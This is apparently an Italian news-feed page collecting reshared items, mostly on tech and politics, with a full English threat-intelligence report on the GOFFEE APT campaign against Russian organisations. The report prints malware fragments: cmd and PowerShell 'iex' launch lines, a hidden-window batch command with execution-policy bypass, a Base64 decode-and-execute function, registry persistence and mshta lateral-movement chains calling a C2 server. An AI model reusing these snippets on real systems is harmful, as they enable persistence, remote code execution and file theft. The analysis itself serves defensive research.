Salta al contenuto principale



Bimbo manda in tilt il sistema: una lezione sulla resilienza delle infrastrutture critiche


@Informatica (Italy e non Italy 😁)
Un episodio apparentemente innocuo, settanta chiamate d’emergenza partite da uno smartwatch al polso di un bimbo, ha messo in crisi i sistemi 112 e 118 in Veneto, rallentando le risposte a richieste reali d’aiuto. Un



Grave falla nel driver audio USB Linux: rischio di esecuzione di codice, ecco la patch


Una vulnerabilità critica nel driver audio USB di Linux è stata recentemente risolta grazie a una patch sviluppata da Takashi Iwai di SUSE. Il problema, identificato nel sottosistema audio del kernel, permetteva letture di memoria fuori dai limiti (out-of-bounds), esponendo i sistemi a rischi significativi. In scenari pratici, un aggressore con accesso fisico al dispositivo avrebbe potuto utilizzare un’apparecchiatura USB appositamente realizzata per compromettere l’integrità del sistema.

Ieri la Cybersecurity and Infrastructure Security Agency (CISA) ha aggiunto due importanti
vulnerabilità del kernel Linux al suo catalogo Known Exploited Vulnerabilities (KEV), confermando che entrambe le falle vengono attivamente sfruttate in attacchi mirati.

Nel dettaglio, la vulnerabilità risiedeva nella gestione dei descrittori USB da parte del driver. Quando un dispositivo audio USB forniva un descrittore con un valore bLength inferiore alla dimensione minima attesa, il driver assumeva comunque la validità del dato e procedeva alla lettura di campi successivi come ID di clock o array di pin. Questa assunzione errata apriva la possibilità di leggere dati fuori dal buffer originariamente allocato.

Le conseguenze di un exploit riuscito potevano essere gravi. Un attacco sfruttando questa falla avrebbe potuto portare alla divulgazione di dati sensibili presenti nella memoria del kernel — come puntatori o informazioni utente — oppure causare crash di sistema tramite accessi a indirizzi non validi. Nei casi peggiori, un attore malevolo avrebbe potuto eseguire codice arbitrario con privilegi elevati, compromettendo completamente il dispositivo.

La patch correttiva, integrata nel kernel Linux il 14 dicembre 2024 da Greg Kroah-Hartman della Linux Foundation, ha introdotto controlli più rigidi sui descrittori ricevuti dai dispositivi USB. Questa modifica incrementa la resilienza del driver audio, prevenendo tentativi di exploit e migliorando al contempo la stabilità generale del sistema per tutti gli utenti che utilizzano periferiche audio USB.

L’incidente sottolinea ancora una volta quanto sia cruciale mantenere aggiornato il proprio kernel e monitorare le vulnerabilità nei sottosistemi meno evidenti come quello audio. Sebbene un attacco di questo tipo richieda accesso fisico al dispositivo, la presenza della vulnerabilità rappresentava comunque una minaccia concreta, soprattutto in contesti come data center, postazioni pubbliche o ambienti aziendali ad alta sicurezza.

L'articolo Grave falla nel driver audio USB Linux: rischio di esecuzione di codice, ecco la patch proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.




Trump vuole docce "potenti" e senza regole


Il presidente degli Stati Uniti Donald Trump ha firmato un ordine esecutivo che elimina le restrizioni federali sulla quantità d’acqua utilizzabile dai soffioni delle docce. La misura cancella i limiti introdotti dalle amministrazioni Obama e Biden, che fissavano il massimo flusso a nove litri al minuto per favorire il risparmio idrico. Nel testo si legge che gli americani "pagano la propria acqua e devono essere liberi di scegliere come fare la doccia, senza intrusioni federali".

Ma non erano i woke quelli che, con tutti i problemi seri che ci sono, stavano a preoccuparsi di cose futili come l'identità di genere, il binarismo sessuale, ecc.?

E questo fa un ordine esecutivo per farsi la doccia con tanta acqua?

agi.it/estero/news/2025-04-10/…



Scuola di Liberalismo 2025 – Messina: Angela VILLANI: «Foi en l’Europe» (Gaetano Martino)

@Politica interna, europea e internazionale

Terzo appuntamento dell’edizione 2025 della Scuola di Liberalismo di Messina, promossa dalla Fondazione Luigi Einaudi ed organizzata in collaborazione con l’Università degli Studi di Messina e la Fondazione Bonino-Pulejo. Il corso,



Clever Engineering Leaves Appliance Useless


Around these parts, we generally celebrate clever hacks that let you do more with less. So if somebody wrote in to tell us how they used multiplexing to drive the front panel of their latest gadget with fewer pins on the microcontroller than would normally be required, we’d be all over it. But what if that same hack ended up leading to a common failure in a piece of consumer hardware?

As [Jim] recently found out, that’s precisely what seems to be ailing the Meaco Arete dehumidifier. When his stopped working, some Internet searching uncovered the cause of the failure: if a segment in the cheap LED display dies and shorts out, the multiplexing scheme used to interface with the front panel essentially reads that as a stuck button and causes the microcontroller to lock up. He passed the info along to us as a cautionary tale of how over-optimization can come with a hidden cost down the line.

Judging by the thread from the Badcaps forum, the problem was identified last summer. But unless you had this particular dehumidifier and went searching for it, it’s not the kind of thing that you’d otherwise run into. The users start by going through the normal diagnostic steps, but come up short (no pun intended).
Given its simplicity, the front panel PCB was not an obvious failure point.
Eventually, user [CG2] resorts to buzzing out all the connections to the two digit seven-segment LED display on the front panel, and finds a dead short on one of the segments. After removing the display, the dehumidifier sprung back to life and everything worked as expected. It wasn’t hard to identify a suitable replacement display on AliExpress, and swapping it out brought the appliance back up to full functionality.

Now to be fair, a shorted out component is likely to cause havoc wherever it might be in the circuit, and as such perhaps it’s the lowest-bidder LED display with the unusually high failure rate that’s really to blame here. But it’s also more likely you’d interpret a dark display as a symptom of the problem rather than the cause, making this a particularly tricky failure to identify.

In any event, judging by how many people seem to be having the same problem, and the fact that there’s now an iFixit guide on how to replace the shorted display, it seems like this particular product was cost-optimized just a bit too far.


hackaday.com/2025/04/10/clever…



quesrte storie mi lasciano con una impotenza e disperazione totale.


La cosa che hanno in comune quei due, è la faccia di bronzo non la medaglia...



GOFFEE continues to attack organizations in Russia


GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious activities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a malicious attachment. Starting in May 2022 and up until summer of 2023, GOFFEE deployed modified Owowa (malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of explorer.exe via spear phishing.

During the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we dubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government entities, and energy companies.

This report in a nutshell:

  • GOFFEE updated distribution schemes.
  • A previously undescribed implant dubbed PowerModul was introduced.
  • GOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral movement.

For more information, please contact: intelreports@kaspersky.com

Technical details

Initial infection


Currently, several infection schemes are being used at the same time. The starting point is typically a phishing email with a malicious attachment, but the schemes diverge slightly from there. We will review two of them relevant at the time of the research.

The first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases, the file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a decoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.

Example of decoy document
Example of decoy document

The file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a malicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an obfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.

Malware execution flow v1
Malware execution flow v1

In the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.

Malware execution flow v2
Malware execution flow v2

Malicious document with a macro
Malicious document with a macro

When a document is opened, scrambled text and a warning image with the message, “This document was created in an earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click ‘Enable Content'”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and restores the text through a normal character replacement operation. Additionally, the macro creates two files in the user’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry value of the “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” registry key.
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
"LOAD"="C:\Users\<USER_NAME>\UserCache.ini.hta"
Although the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value of the registry key are run automatically for the currently logged-on user.

UserCache.ini.hta content
UserCache.ini.hta content

The malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and output redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it. Only then does the dropped JavaScript run PowerModul:
cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js
It is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files, including the local user’s name, instead of environment variables. As a result, the control keys, as well as the file sizes, will vary depending on the current user’s name.

UserCacheHelper.lnk.js content
UserCacheHelper.lnk.js content

The “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro. This file contains encoded PowerModul.

PowerModul
MD560A53D2C653991F086C4E6663D652CF2
SHA1636814C31B78DD291049029A655238D7ADAFF041
SHA256BE1D0FAF1C253FAACBA1059971B01D1D646256D7B2E557DA55ED059542AFDBCD
File typePowerShell
File size6.66 KB
File nameUserCache.ini

PowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2 server. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to download and launch the PowerTaskel implant, and was considered a relatively minor component for launching PowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from PowerTaskel’s led us to classify it as a separate family.

UserCache.ini content
UserCache.ini content

In the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded string. The beginning and end of the decoded script are shown in the images below, while the middle section contains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the registry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the functionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in VBA.

Beginning of PowerModul
Beginning of PowerModul

End of PowerModul
End of PowerModul

When accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the computer name, username, and disk serial number, separated with underscores:
hxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}
The response from the C2 is in XML format, complete with scripts encoded in Base64:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/plain
Content-Length: 35373
Connection: keep-alive

<Configs>
<Config>
<Module>ZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
<Module>ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...</Module>
There is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a predefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded is empty, and therefore, nothing is executed. However, we have observed cases where the string contained content. An example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown below:
function OfflineWorker() {
try{
$___offlineFlash = 'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';

if($___offlineFlash -ne ''){
$___flashOfflineDecoded = FromBase64 $___offlineFlash;
Invoke-Expression($___flashOfflineDecoded);
}
}
catch{}
}
The payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.

FlashFileGrabber


As its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We have identified two variants: FlashFileGrabber and FlashFileGrabberOffline.

FlashFileGrabberOffline main routine
FlashFileGrabberOffline main routine

FlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them to the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template “%TEMP%\CacheStore\connect\<VolumeSerialNumber>\”. The folder names “CacheStore” and “connect” are hardcoded within the script. Examples of such paths are provided below:
%TEMP%\CacheStore\connect\62431103\2024\some.pdf
%TEMP%\CacheStore\connect\62431103\Documents\some.docx
%TEMP%\CacheStore\connect\62431103\attachment.jpg
%TEMP%\CacheStore\connect\6c1d1372\Print\resume.docx
Additionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the copied files, including the full path to the original file, its size, and dates of last access and modification. Furthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the aforementioned metadata. This allows the malware to avoid copying the same files more than once:
%TEMP%\CacheStore\connect\<VolumeSerialNumber>\ftree.db
%AppData%\internal_profiles.db
The list of file extensions of interest is as follows:

.7z.kml.rar
.conf.log.rtf
.csv.lrf.scr
.doc.mdb.thm
.docx.ods.txt
.dwg.odt.xlm
.heic.ovpn.xls
.hgt.pdf.xlsm
.html.png.xlsx
.jpeg.pptx.xml
.jpg.ps1.zip

FlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is capable of sending files to the C2 server.

FlashFileGrabber's routines
FlashFileGrabber’s routines

USB Worm


USB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm renames the files on the removable disk with a random name, retaining their original extension, and assigns them the “Hidden” file attribute. The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with the original file.

USB Worm main routine
USB Worm main routine

Additionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.

CreateVBSFile() and CreateBatFile() functions
CreateVBSFile() and CreateBatFile() functions

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & ".\zermndzg.bat" & Chr(34), 0, False
WshShell.Run Chr(34) & ".\zermndzg.docx" & Chr(34), 1, False
Set WshShell = Nothing
Example of the contents of a malicious VBS
powershell -exec bypass -windowstyle hidden -nop -c "$raw= [io.file]::ReadAllText(""".\UserCache.ini"""); iex $raw;"
Example of the contents of a malicious batch file

A shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS file.

CreateShortcutForFile() function
CreateShortcutForFile() function

To disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the original file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most recently accessed files by sorting them according to their LastAccessTime attribute.

System infection scheme via removable media
System infection scheme via removable media

PowerTaskel


We have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early 2023, as PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted environment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and commands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. The request payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-byte key, and then converted to Base64.

Based on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the open-source Medusa Mythic agent, which was originally written in Python.

Comparison of Medusa and PowerTaskel configuration code
Comparison of Medusa and PowerTaskel configuration code


Comparison of Medusa and PowerTaskel “checkin” function code

PowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its capabilities to downloading and uploading files, running processes, etc. However, its functionality is often insufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic agent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process memory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64 shellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the “Lateral Movement” section.

In at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task. FolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files from remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.

Lateral movement


Following system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate its privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the Sysinternals suite. The PsExec utility is dropped into the current directory where PowerTaskel is located and is used to execute mshta.exe with system privileges, passing a URL as an argument.

The images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the presence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2 server. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.


Getting “ntuser.exe”


The “ntuser.exe” executable running “mshta.exe”

The next image illustrates an example of the execution flow of various scripts and commands started with the privilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s” specifies that the process it launches should run under the System account. The launched program “mshta.exe” accepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file is cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk using the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe. The desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of user.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell script whose task is to extract a payload from a hardcoded address and execute it. In this case, the payload is PowerTaskel, which now runs with the elevated privileges.

Example of execution flow on an infected system
Example of execution flow on an infected system

Once launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information about the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates that PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The primary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.

The final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft Windows Remote Management) service, located on a remote host on the local network, via the loaded Mythic agent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.

HTTP header for WinRM request
HTTP header for WinRM request

The WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves launching the mshta.exe utility on the remote host with a URL as an argument. The following examples illustrate the execution chains observed on remote hosts:
wmiprvse.exe -secured -Embedding
-> cmd.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wsmprovhost.exe
-> mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> cmd.exe /Q /c powershell.exe mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta

wmiprvse.exe -secured -Embedding
-> powershell.exe /C mshta.exe https://<domain>.com/<word>/<word>/<word>/<word>/<word>.hta
Recently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary Mythic agent during lateral movement.

Mythic agent HTA
MD5615BD8D70D234F16FC791DCE2FC5BCF0
SHA1EF14D5B97E093AABE82C4A1720789A7CF1045F6D
SHA256AFC7302D0BD55CFC603FDAF58F5483B0CC00D354274F379C75CFA17F6BA6F97D
File typePolyglot (HTML Application)
File size165.32 KB
File nameduplicate.hta

The mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument. However, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large, approximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly interpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and occupies approximately 80% of its size. It is followed by two Base64-encoded PowerShell scripts, separated by a regular line break, and finally, the HTA file itself.

Polyglot payload
Polyglot payload

When the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers control to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines the argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used as the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the HTA file during download. To do this, the script iterates through all files in the cache folder and checks their contents for the presence of a specific magic string.

Deobfuscated JScript from the HTA section of the payload
Deobfuscated JScript from the HTA section of the payload

If an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo” command, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10 seconds, after which the dropped files will be deleted.


Deobfuscated “settings.js”

The running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the HTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the contents of which are then passed to the powershell.exe command line.
powershell.exe -c "$INbqDKHp = \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\duplicate````[1````].hta\";$OdfUfjp = get-content $env:USERPROFILE\\settings.ps1;$KWfWXqek=1;Invoke-Expression $OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;"
The script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the HTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three times, passing the path to the HTA file and the counter as arguments, and incrementing the value of the “$KWfWXqek” variable by 1 each time.


Deobfuscated “settings.ps1”

During each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies Base64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by searching for the substring “<HTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded scripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-encoded script.
The first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary for executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the HTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to the loaded shellcode, which is the self-configuring code of the Mythic agent.

Victims


According to our telemetry, the identified targets of the malicious activities described in this article are located in Russia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse, encompassing organizations in the mass media and telecommunications sectors, construction, government entities, and energy companies.

Attribution


In this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group. Additionally, HTA files and various scripts were employed in the infection chain.

The malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what we observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously used by GOFFEE.

Considering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.

Conclusions


Despite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.

For the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally, GOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber, and USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in PowerShell and C.

While GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant enough to suggest that they can be confused with another actor.


securelist.com/goffee-apt-new-…



SUD SUDAN. Pazienti muoiono di colera mentre cercano cure dopo i tagli agli aiuti USA


@Notizie dall'Italia e dal mondo
Otto persone, tra cui cinque bambini, hanno perso la vita nel tentativo disperato di raggiungere un centro medico per ricevere cure contro il colera. A denunciare l’accaduto è stata l’organizzazione Save the Children, che ha attribuito le



Corpi che sfuggono: Schütte a Venezia


Sono stato a vedere la mostra Genealogies di Thomas Schütte, allestita dalla Pinault Collection a Venezia nella sede di Punta della Dogana. Un’esposizione che attraversa decenni di produzione, materiali eterogenei e registri espressivi che vanno dall’ironia alla gravità. L’essere umano è al centro: corpi, volti, figure. Ma sempre sfuggenti. Mai rassicuranti.

Il lavoro di Schütte sul corpo mi ha colpito in particolare per la sua capacità di destabilizzare. Le figure non aderiscono a un codice normativo: sono deformate, abbozzate, eccessive, assenti. I “Fratelli” presentano espressioni contratte, fisse, ambigue. Nascono da uno studio sui busti romani e sono ispirati dallo scandalo Mani Pulite. Mi hanno molto colpito: mi sono sentito osservato e inquietato da queste figure mute, statiche, eppure piene di tensione.

“Vater Staat”, imponente e trasandato con la sua vestaglia, è lo Stato ridotto a una goffa caricatura. Un padre vecchio, immobile, incapace eppure enorme. E proprio da questa immobilità emerge una strana forma di potenza simbolica. Lo sguardo dell’artista, in questi casi, è acuto, critico, capace di riflettere in modo ironico e cupo sul potere e sull’identità.

Il corpo qui non è un’icona, ma un campo di tensioni. Sospeso tra fallimento, desiderio e memoria. La mia passione per l’arte queer mi ha fatto pensare al corpo come indefinito, che scivola via dalla norma. Anche se questa lettura è del tutto personale e soggettiva, resta però chiaro che questi corpi non si lasciano facilmente decifrare, né tantomeno glorificare.

La rappresentazione femminile, invece, mi ha coinvolto meno. Pur essendo varia e apparentemente sovversiva (le Donne piangenti, le donne distese deformate, la Geisha attempata), mi è sembrata spesso meno profonda e meno incisiva rispetto al lavoro fatto sui corpi e sui volti maschili. Un po’ come se l’artista stesse cercando un modo alternativo di raffigurare le donne, ma da una posizione inevitabilmente maschile, senza riuscire davvero a costruirne uno alternativo e senza scardinarne lo sguardo.

Durante la visita, una sorpresa: un’immagine bellissima e inattesa. Alcune opere erano collocate in cima al torrione, con il belvedere sulla laguna. Il cielo di Venezia, la luce dell’acqua, il vento: un momento sospeso. E anche lì, in quell’aria, il corpo sembrava sfuggire, come un fantasma.

@Arte e Cultura @Cultura
#arte #venezia #puntadelladogana #ThomasSchutte

reshared this



L'insostenibile pesantezza dei sostenitori di Trump.


In questi giorni caotici in cui le notizie da oltreoceano si susseguono come proiettili di una mitragliatrice, non riesco a non pensare ad un aspetto che rischia di passare inosservato, schiacciato dal peso dei gravi effetti di Trump sul mondo:

I SOSTENITORI DI TRUMP IN ITALIA.

Ne conosco diversi, tanti, troppi: quelli che già da prima del voto sostenevano che Trump fosse l'unica scelta possibile, visto che Biden era chiaramente uscito di senno e, successivamente, "ma chi voti? Voti la Harris? Una sciacquetta senza nessuna credibilità".

C'era chi sosteneva che la nuova venuta di Trump avrebbe finalmente portato la pace nel mondo, un mondo più tranquillo dopo che quel "guerrafondaio di Biden" aveva fatto di tutto per rovinarlo.

"E poi vuoi mettere l'economia?" Sicuramente Trump, un affarista nato, avrebbe fatto risorgere i mercati mettendo al contempo la Cina al suo posto, e "vedrai come risorge l'occidente!"

Oggi, in un mondo normale, gli italiani che sostenevano tutto questo non dovrebbero uscire di casa per la vergogna. Io al loro posto non mi farei più vedere, cambierei cognome, nasconderei la testa sotto la sabbia lasciando le terga al vento, pur di non dover parlare più con nessuno: perché la figura di merda colossale che starei facendo non sarebbe più riparabile.

E invece no.

Li trovi ancora a scrivere blog, articoli, cazzate dai titoli simili a questo: "Dazi USA a Taiwan: suicidio economico o strategia geniale?".

A qualunque persona con due neuroni attivi pare ormai chiaro che l'unico veramente fuori di testa sia proprio Trump, più che Biden, che gli Stati Uniti di sono ormai una barzelletta, che il consigliere economico di trump, Peter Navarro, sia uno che deve essersi fatto di qualche droga tagliata male, ma i "nostri" no, a loro non la si fa: stoici, continuano ad arrampicarsi sugli specchi. Trump è un grande statista, è tutto calcolato, "almeno tolgono l'ideologia woke", Musk un grande imprenditore (praticamente un filantropo); insomma, tutto normale. E' ormai chiarissimo che l'operato di Trump sia sovrapponibile ai desideri di Punti per l'occidente. Io qualche domandina me la farei e qualche risposta me la darei.

A me pare evidente che, se anche per il mondo ci potrebbe essere qualche speranza, l'Italia è già bella che spacciata: perché le persone così sono ormai cresciute e diventate abbastanza da formare una massa critica. Come si può essere così ottusi?

Vi prego, datemi un punto di vista diverso dal mio, fatemi cambiare idea.

#trump #dazi #europa #usa #italia #taiwan #harris #musk #destra #trumpismo #Italia #trumpism #guerradeidazi #tariffs #russia

reshared this

in reply to Simon Perry

se la massa è diventata un insieme di persone che pensa solo come una tifoseria da stadio questo è il risultato.
Perché tu come spieghi i sondaggi che danno sempre al 30% FDI dopo due anni e dopo aver disatteso tutte le promesse in campagna elettorale?
Perché ai tifosi piace odiare, quindi immigrati e teoria gender/woke sono gli unici argomenti di cui si riempiono la bocca.
E i tifosi esultano, che bello odiare.
in reply to Emanuele

@Emanuele i sondaggi li spiego con ignoranza, arretratezza, malcontento generalizzato e indistinto verso "qualunque cosa" che i partiti di destra e non solo cavalcano sempre.

Però resta il fattore ultimo: che quel 30% ce l'hanno perché, com'è come non è, rappresentano una fetta della popolazione.

La restante fetta o non ha abbastanza forza o è indifferente.

A proposito dell'indifferenza ci sono voci su voci che dicono che l'indifferenza è stata costruita nel tempo sotto le spinte della propaganda e della disinformazione che arrivano da est.



Tutto sullo scandalo dei telefoni privati dei vertici dello Stato on line


@Informatica (Italy e non Italy 😁)
Conversazione di Startmag con Andrea Mavilla, esperto informatico che ha avvisato l'Agenzia per la cybersecurity nazionale (Acn) circa i numeri di telefono privati dei vertici dello Stato scovati online

L'articolo proviene dalla sezione #Cybersecurity di




Michail Gorbaciov e il caos necessario – a cura di Laura Miani e Luigi Lusenti – testimonianze, riflessioni e suggestioni sull’uomo della perestroika
freezonemagazine.com/articoli/…
Saggio corale su un uomo solo al centro della Storia Chi era davvero Michail Gorbaciov? Un idealista troppo occidentale per il suo tempo? Un ingenuo riformatore


Everyone’s Talking GPMI, Should you?


The tech press has been full of announcements over the last day or two regarding GPMI. It’s a new standard with the backing of a range of Chinese hardware companies, for a high-speed digital video interface to rival HDMI. The Chinese semiconductor company HiSilicon have a whitepaper on the subject (Chinese language, Google Translate link), promising a tremendously higher data rate than HDMI, power delivery well exceeding that of USB-C, and interestingly, bi-directional data transfer. Is HDMI dead? Probably not, but the next few years will bring us some interesting hardware as they respond to this upstart.

Reading through pages of marketing from all over the web on this topic, it appears to be an early part of the push for 8k video content. There’s a small part of us that wonders just how far we can push display resolution beyond that of our eyes without it becoming just a marketing gimmick, but it is true to say that there is demand for higher-bandwidth interfaces. Reports mention two plug styles: a GPMI-specific one and a USB-C one. We expect the latter to naturally dominate. In terms of adoption, though, and whether users might find themselves left behind with the wrong interface, we would expect that far from needing to buy new equipment, we’ll find that support comes gradually with fallback to existing standards such as DisplayPort over USB-C, such that we hardly notice the transition.

Nearly a decade ago we marked the passing of VGA. We don’t expect to be doing the same for HDMI any time soon in the light of GPMI.


hackaday.com/2025/04/10/everyo…



Windows Server: falla critica scoperta in Active Directory


Microsoft ha rilasciato un aggiornamento di sicurezza critico per risolvere il CVE-2025-29810, una vulnerabilità di elevazione dei privilegi che colpisce Active Directory Domain Services (AD DS). La vulnerabilità ha un punteggio CVSS di 7,5, il che indica un rischio significativo per la sicurezza nonostante l’elevata complessità dell’attacco.

“Un controllo di accesso improprio in Active Directory Domain Services consente a un aggressore autorizzato di elevare i privilegi su una rete”, ha affermato Microsoft nel suo riepilogo esecutivo. La falla, rivelata l’8 aprile nell’ambito del lancio del Patch Tuesday di aprile 2025, potrebbe consentire agli aggressori di ottenere un accesso non autorizzato a livello di sistema sulle reti aziendali.

